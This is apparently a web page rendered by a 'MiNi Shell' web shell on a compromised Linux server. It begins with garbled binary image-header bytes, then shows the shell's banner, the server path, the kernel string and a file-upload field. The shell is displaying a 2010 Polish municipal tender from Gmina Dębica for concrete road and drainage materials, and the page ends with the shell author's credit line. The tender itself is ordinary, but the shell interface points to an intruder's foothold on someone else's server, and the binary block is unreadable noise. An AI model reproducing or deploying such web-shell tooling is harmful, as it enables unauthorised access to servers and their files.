JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100407/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100407/77369-N-2010.html

<p class="kh_header"><b>Dębica: Dostawa materiałów budowlanych używanych przy drobnych robotach budowlanych przy bieżącym utrzymania dróg gminnych i renowacji rowów w Gminie Dębica w latach 2010 - 2012.</b><br>
<b>Numer ogłoszenia: 77369 - 2010; data zamieszczenia: 07.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy w Dębicy , ul. Batorego 13, 39-200 Dębica, woj. podkarpackie, tel. 14 6803342, 6803310, faks 14 6803336.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugdebica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów budowlanych używanych przy drobnych robotach budowlanych przy bieżącym utrzymania dróg gminnych i renowacji rowów w Gminie Dębica w latach 2010 - 2012..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa materiałów budowlanych używanych przy drobnych robotach budowlanych przy bieżącym utrzymania dróg gminnych i renowacji rowów w Gminie Dębica w latach 2010 - 2012.
Dostawa materiałów budowlanych odbywać się będzie sukcesywnie w okresie trwania umowy o dostawę - według bieżących potrzeb, loco -  miejsce wskazane przez Zamawiającego na terenie Gminy Dębica . 
Zamawiający dopuszcza możliwość składania ofert częściowych - ilość części : 2
Szacunkowa planowana ilość dostaw  w okresie od dnia zawarcia umowy  do 31.12.2012 r.  wynosi odpowiednio: 

Część 1)  :
1. Płyty betonowe ażurowe- zbrojone  o wymiarach  1,00  m  x  0,76  m  x  0,06  m - 600  sztuk
2. Płyty betonowe ażurowe- zbrojone  o wymiarach  0,80  m  x  0,50  m  x  0,09  m  - 300  sztuk   
3. Korytka ściekowe ( długość w metrach bieżących ) o wymiarach 1,00m x 0,35m x 0,14m i wygięciu łuku 0,07m - 300  sztuk
4. Ścieki betonowe  trapezowe ( zbrojone ) o wymiarach 1,00m x 0,50m x h = 0,35m - 300 sztuk

Część 2) : 
1. Rury betonowe o średnicy 0,20  m  i długości 0,75  m - 150 sztuk   
2. Rury betonowe o średnicy 0,30  m  i  długości 0,75  m - 150 sztuk
3. Rury betonowe o średnicy 0,40  m  i długości 0,75  m - 150 sztuk
4. Rury betonowe o średnicy 0,50  m  i długości 0,80  m - 150 sztuk
5. Rury betonowe o średnicy 0,60  m  i długości 0,75  m - 150 sztuk  
6. Rury betonowe zbrojone o średnicy 0,40  m  i długości 0,75 - 450 sztuk
7. Rury betonowe zbrojone o średnicy 0,50  m  i długości 0,80  m - 300 sztuk  
8. Rury betonowe zbrojone o średnicy 0,60  m  i długości 0,75  m - 300 sztuk
9. Rury betonowe zbrojone o średnicy 0,60  m  i długości 1,00  m - 50 sztuk
10. Kręgi betonowe zbrojone o średnicy 0,80  m  i długości 0,75  m - 75 sztuk   
11. Kręgi betonowe zbrojone o średnicy 1,00  m  i długości 1,00  m - 60 sztuk   
12. Kręgi betonowe zbrojone o średnicy 1,20  m  i długości 0,80  m - 30 sztuk   

Zamawiający zastrzega sobie możliwość ograniczenia dostaw ( w dół )  do  15 % ogólnej ilości danego asortymentu.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 44.11.42.00-4, 44.11.42.20-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek posiadania wiedzy i doświadczenia jest spełniony, jeżeli Wykonawca wykaże,  że w okresie ostatnich 3 lat przed  upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - tym okresie) wykonał lub wykonuje dostawy w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia  tj. co najmniej 2 dostawy materiałów budowlanych  o wartości minimum 10 000,00 zł brutto   każda, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączy dokument potwierdzający, że dostawy te zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wykonawca może zamiast zaświadczenia wymienionego w pkt III.5)  złożyć równoważne zaświadczenie wystawione przez podmioty mające siedzibę w innym państwie członkowskim Europejskiego Obszaru Gospodarczego.
2. Wykonawca winien złożyć  jako integralną część oferty - Formularz Cenowy (do Części 1 i Części 2 zamówienia) z cenami jednostkowymi netto na poszczególny asortyment, stawką podatku VAT, i ceną brutto.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. W przypadku zaistnienia uzasadnionych okoliczności, których Zamawiający nie mógł przewidzieć w dniu zawarcia umowy, Zamawiający może dokonać zmniejszenia ilości  przedmiotu umowy. 
2. Zmniejszenie ilości przedmiotu Umowy w toku jej realizacji nie może przekroczyć 15% ilości określonych w  Formularzu Cenowym stanowiącym integralną część niniejszej umowy.
3. Ceny jednostkowe netto nie ulegną zmianie (podwyższeniu) do dnia 31.12.2010r. Od roku 2011 ceny jednostkowe netto na wniosek Strony mogą zostać zwaloryzowane wg średniorocznego wskaźnika cen dóbr i usług konsumpcyjnych ogłaszanego przez Prezesa GUS w Monitorze Polskim.
4. W przypadku zmian przepisów dotyczących zmiany stawki podatku VAT, stawka ta ulega zmianie po upływie 7 dni od dnia wpływu pisma (wraz z uzasadnieniem) Wykonawcy do siedziby Zamawiającego.
5. W przypadku zmiany cen na niższe  - ceny ulegają obniżeniu z dniem pisemnego powiadomienia Zamawiającego (data wpływu pisma do siedziby Zamawiającego).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugdebica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Dębica, 39-200 Dębica,  ul. Stefana Batorego 13 - pokój 29.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.04.2010 godzina 10:00, miejsce: Urząd Gminy Dębica, 39-200 Dębica,  ul. Stefana Batorego 13 - Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa materiałów budowlanych używanych przy drobnych robotach budowlanych przy bieżącym 
utrzymania dróg gminnych i renowacji rowów w Gminie Dębica w latach 2010 - 2012..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 1)  :Szacunkowa planowana ilość dostaw  w okresie od dnia zawarcia umowy  do 31.12.2012 r.  wynosi odpowiednio
1. Płyty betonowe ażurowe- zbrojone  o wymiarach  1,00  m  x  0,76  m  x  0,06  m - 600  sztuk
2. Płyty betonowe ażurowe- zbrojone  o wymiarach  0,80  m  x  0,50  m  x  0,09  m  - 300  sztuk   
3. Korytka ściekowe ( długość w metrach bieżących ) o wymiarach 1,00m x 0,35m x 0,14m i wygięciu łuku 0,07m - 300  sztuk
4. Ścieki betonowe  trapezowe ( zbrojone ) o wymiarach 1,00m x 0,50m x h = 0,35m - 300 sztuk
Dostawa materiałów budowlanych odbywać się będzie sukcesywnie w okresie trwania umowy o dostawę - według bieżących potrzeb, loco -  miejsce wskazane przez Zamawiającego na terenie Gminy Dębica . 
Zamawiający zastrzega sobie możliwość ograniczenia dostaw ( w dół )  do  15 % ogólnej ilości danego asortymentu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.11.42.00-4, 44.11.42.20-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa materiałów budowlanych używanych przy drobnych robotach budowlanych przy bieżącym 
utrzymania dróg gminnych i renowacji rowów w Gminie Dębica w latach 2010 - 2012..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 2) : Szacunkowa planowana ilość dostaw  w okresie od dnia zawarcia umowy  do 31.12.2012 r.  wynosi odpowiednio: 
1. Rury betonowe o średnicy 0,20  m  i długości 0,75  m - 150 sztuk   
2. Rury betonowe o średnicy 0,30  m  i  długości 0,75  m - 150 sztuk
3. Rury betonowe o średnicy 0,40  m  i długości 0,75  m - 150 sztuk
4. Rury betonowe o średnicy 0,50  m  i długości 0,80  m - 150 sztuk
5. Rury betonowe o średnicy 0,60  m  i długości 0,75  m - 150 sztuk  
6. Rury betonowe zbrojone o średnicy 0,40  m  i długości 0,75 - 450 sztuk
7. Rury betonowe zbrojone o średnicy 0,50  m  i długości 0,80  m - 300 sztuk  
8. Rury betonowe zbrojone o średnicy 0,60  m  i długości 0,75  m - 300 sztuk
9. Rury betonowe zbrojone o średnicy 0,60  m  i długości 1,00  m - 50 sztuk
10. Kręgi betonowe zbrojone o średnicy 0,80  m  i długości 0,75  m - 75 sztuk   
11. Kręgi betonowe zbrojone o średnicy 1,00  m  i długości 1,00  m - 60 sztuk   
12. Kręgi betonowe zbrojone o średnicy 1,20  m  i długości 0,80  m - 30 sztuk   
Dostawa materiałów budowlanych odbywać się będzie sukcesywnie w okresie trwania umowy o dostawę - według bieżących potrzeb, loco -  miejsce wskazane przez Zamawiającego na terenie Gminy Dębica . 
Zamawiający zastrzega sobie możliwość ograniczenia dostaw ( w dół )  do  15 % ogólnej ilości danego asortymentu  ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.11.42.00-4, 44.11.42.20-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com